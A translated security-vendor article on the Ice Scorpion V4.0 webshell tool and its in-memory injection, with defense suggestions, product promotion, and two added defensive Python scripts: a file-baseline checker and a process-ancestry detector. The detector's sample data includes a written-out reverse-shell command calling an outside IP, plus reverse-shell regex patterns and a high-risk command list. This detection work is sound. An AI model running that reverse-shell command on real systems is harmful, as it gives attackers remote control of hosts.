Ice Scorpion V4.0 attack, security dog products can be fully detected
2022-08-05 03:22:00 【Safe Dog News】
Disclaimer
Solemn declaration: the technology, ideas and tools discussed on this account are provided solely for learning and exchange for security purposes. No one may use them for illegal purposes; anyone who does bears the consequences themselves!
During the past two years of large-scale offensive and defensive drills, "Ice Scorpion" caught many defending units off guard and left them badly hurt. In response to Ice Scorpion's characteristics, security vendors then updated their security products. When this year's live offensive and defensive exercises officially began, Ice Scorpion unexpectedly appeared in the "new look of 4.0", once again leaving many defending units unable to cope with it.
Faced with this threat, the Security Dog team updated the rule base of its "Webshell killing engine" on the afternoon of July 25, 2022. At the same time, Safe Dog products also cover Ice Scorpion 4.0's "memory horse injection" (in-memory webshell) feature, and the "Memory Horse Killing Engine" detects it by default.
This article introduces the features of Ice Scorpion V4.0 and defense suggestions, hoping to help defending units during live exercises.
Part One: Ice Scorpion V4.0
1. The origin of Ice Scorpion
The traditional webshell management tool "Chopper" has obvious attack-traffic characteristics and is easily intercepted by detection equipment, so attackers urgently needed a webshell with encrypted communication: because the traffic is encrypted, traditional WAF and IDS devices have difficulty detecting it. Thus the dynamic binary encrypted website management client "Ice Scorpion" came into being. The threats it brings, such as web page backdoor attacks and fileless attacks, have caused great trouble for traditional security products.
2. Ice Scorpion V4.0
"Ice Scorpion" is one of the most popular WebShell management tools. The first-generation WebShell management tool "Chopper" has obvious traffic characteristics and is easily detected. The traffic of Ice Scorpion is encrypted, which effectively evades detection by traffic devices. The "Ice Scorpion" client is developed in Java; the latest version is v4.0, the management side is cross-platform, and it supports ASP, ASPX, JSP, PHP and other environments.
Figure 1
The latest V4.0 supports fileless injection of a memory horse (in-memory webshell) via Java Agent.
Figure 2
It can be said that this revision of Ice Scorpion has rendered some of the countermeasures defenders built against Ice Scorpion last year useless.
Part Two: Defense Suggestions for Ice Scorpion V4.0
1. Defensible points
(1) Focus on defending against file upload, file write and file inclusion vulnerabilities;
(2) Analyze the traffic side of all webshell types built into Ice Scorpion V4.0 and detect each type of webshell in a targeted manner;
(3) Enable monitoring of abnormal system behavior to detect dangerous actions such as reverse shells and execution of high-risk system commands;
(4) Check the security baseline carefully, revise it in time, and record and alert on suspicious behavior of suspicious files to facilitate auditing.
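The baseline check in point (4) and the file-write defenses in point (1) can be implemented as a file-integrity diff over the web root: hash every file once, store the result outside the web root, and compare the live tree against it on a schedule. The following Python script is an added example, not Safe Dog's or Behinder's code; the executable-extension list and the temporary-directory scenario it runs are assumptions constructed for the demonstration.

```python
"""Web root file-baseline check.

Added example, not Safe Dog's or Behinder's code. It records a SHA-256
baseline of every file under a web root and later diffs the live tree
against it, reporting files that were added, modified or removed. New or
modified files with server-executed extensions are the typical residue of
a file upload or file write vulnerability, so they are listed separately.
"""
import hashlib
import json
import tempfile
from pathlib import Path
from typing import Dict, List

# Extensions the web server would execute. Assumption: derived from the
# ASP/ASPX/JSP/PHP environments the article lists, plus common variants.
EXECUTABLE_EXT = {".php", ".phtml", ".jsp", ".jspx", ".asp", ".aspx", ".ashx"}


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large uploads are not loaded into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path) -> Dict[str, str]:
    """Map every file under root (relative POSIX path) to its SHA-256 digest."""
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def save_baseline(baseline: Dict[str, str], store: Path) -> None:
    """Persist the baseline; keep the store outside the web root, unwritable by the web user."""
    store.write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(store: Path) -> Dict[str, str]:
    return json.loads(store.read_text())


def diff_baseline(old: Dict[str, str], new: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare two baselines and separately flag executable additions/modifications."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    modified = sorted(k for k in set(old) & set(new) if old[k] != new[k])
    suspicious = sorted(
        k for k in added + modified if Path(k).suffix.lower() in EXECUTABLE_EXT
    )
    return {"added": added, "removed": removed, "modified": modified, "suspicious": suspicious}


def demo() -> Dict[str, List[str]]:
    """Constructed scenario in a temp dir: take a baseline, then simulate an
    upload, an edit to an existing script and a deleted static asset."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "webroot"
        (root / "static").mkdir(parents=True)
        (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
        (root / "static" / "logo.png").write_bytes(b"\x89PNG constructed placeholder")

        store = Path(tmp) / "baseline.json"  # outside the web root
        save_baseline(build_baseline(root), store)

        # Simulated post-incident state (constructed content, not a real webshell).
        (root / "upload").mkdir()
        (root / "upload" / "avatar.jsp").write_text("<% /* constructed sample */ %>\n")
        (root / "index.php").write_text("<?php echo 'hello'; /* changed */ ?>\n")
        (root / "static" / "logo.png").unlink()

        return diff_baseline(load_baseline(store), build_baseline(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:10s} {paths}")
```

Run it on a real deployment by calling `save_baseline(build_baseline(Path("/var/www/html")), store)` right after a clean release and `diff_baseline(load_baseline(store), build_baseline(root))` from a cron job; every entry under `suspicious` is a file the server would execute that did not exist, or has changed, since the release.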
2. Security Dog Cloud Eye can detect Ice Scorpion V4.0
The new-generation cloud host intrusion monitoring and security management platform "Cloud Eye" has functions such as "Webshell killing" and "Memory horse detection" that support detection of Ice Scorpion 4.0 attacks.
In addition, when an attacker uses the Ice Scorpion tool to connect to a virtual terminal and execute commands, functions such as "process monitoring" can also detect this.
Host Webshell killing
Figure 3
Host memory check
Figure 4
3. Security Dog Cloud Armor can detect Ice Scorpion V4.0
The adaptive container security management system "Yunjia" (Cloud Armor) supports functions such as "Image Webshell Scanning", "Container Webshell Scanning" and "Container Memory Horse Detection", which detect Ice Scorpion 4.0 attacks.
In addition, when an attacker uses the Ice Scorpion tool to connect to a virtual terminal and execute commands, functions such as "process monitoring" and "behavior model" can also detect this.
Image Webshell killing
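The "process monitoring" detection mentioned here and for Cloud Eye above comes down to process-ancestry analysis: a shell or high-risk command is suspicious when its parent chain leads back to the web server process, while the same command in an administrator's session is not. The following Python script is an added example, not Safe Dog's or Behinder's code; the process-name sets, the pattern list and the event snapshot are constructed assumptions (in practice the events would come from auditd execve records or a procfs scan).

```python
"""Process-behavior check for web-server-spawned shells and high-risk commands.

Added example, not Safe Dog's or Behinder's code. It walks a snapshot of
process events (constructed below) and raises an alert whenever a process
whose ancestry leads back to a web server executes a shell, a high-risk
command, or a command line carrying a reverse-shell pattern. Interactive
work by an administrator outside the web server's tree produces no alert.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Names of the processes that host web applications. Assumption: common
# defaults; adapt to the servers actually deployed.
WEB_PROCESSES = {"java", "tomcat", "php-fpm", "httpd", "apache2", "nginx", "w3wp.exe"}
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}
# Commands a web application has no business running: the article's
# "high-risk system commands". Assumption: illustrative list.
HIGH_RISK = {"whoami", "id", "uname", "curl", "wget", "nc", "ncat", "chmod",
             "crontab", "useradd", "net.exe", "certutil.exe"}
# Reverse-shell indicators of the kind host EDR rules look for.
REVERSE_SHELL_RE = re.compile(
    r"/dev/tcp/|\bnc\b.*\s-e\s|\bbash\s+-i\b|\bsocat\b.*\bexec\b", re.IGNORECASE
)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    comm: str      # executable name
    cmdline: str
    user: str


def web_ancestor(pid: int, by_pid: Dict[int, ProcEvent]) -> Optional[ProcEvent]:
    """Follow the parent chain upward from pid; return the first web server process."""
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen:  # `seen` guards against pid reuse loops
        seen.add(cur.pid)
        if cur.comm in WEB_PROCESSES:
            return cur
        cur = by_pid.get(cur.ppid)
    return None


def analyze(events: List[ProcEvent]) -> List[Dict[str, object]]:
    """Return one alert per process that misbehaves under a web server ancestor."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        ancestor = web_ancestor(ev.ppid, by_pid)
        if ancestor is None:
            continue  # not descended from a web server: out of scope
        reasons = []
        if ev.comm in SHELLS:
            reasons.append("web server spawned a shell")
        tokens = ev.cmdline.split()
        if ev.comm in HIGH_RISK or any(t in HIGH_RISK for t in tokens):
            reasons.append("high-risk command under web server")
        if REVERSE_SHELL_RE.search(ev.cmdline):
            reasons.append("reverse shell pattern")
        if reasons:
            alerts.append({"pid": ev.pid, "user": ev.user, "ancestor": ancestor.comm,
                           "cmdline": ev.cmdline, "reasons": reasons})
    return alerts


# Constructed sample snapshot: a Tomcat JVM that spawned commands (as a
# webshell virtual terminal would) plus an unrelated administrator session.
SAMPLE_EVENTS = [
    ProcEvent(1, 0, "systemd", "/sbin/init", "root"),
    ProcEvent(1200, 1, "java", "java -jar /opt/tomcat/bin/bootstrap.jar start", "tomcat"),
    ProcEvent(1350, 1200, "sh", "sh -c whoami", "tomcat"),
    ProcEvent(1351, 1350, "whoami", "whoami", "tomcat"),
    ProcEvent(1400, 1200, "bash", "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1", "tomcat"),
    ProcEvent(2000, 1, "bash", "-bash", "admin"),
    ProcEvent(2001, 2000, "curl", "curl https://example.invalid/status", "admin"),
]


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

The ancestry walk is what separates this from a plain command blocklist: `curl` run by the administrator (pid 2001) is ignored, while the same kind of command under the Tomcat JVM is reported together with the web server it descends from, which is the context an analyst needs to tie the event back to a webshell session.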
Figure 5
Container Webshell Killing
Figure 6
Container memory detection
Figure 7
References
https://github.com/rebeyond/Behinder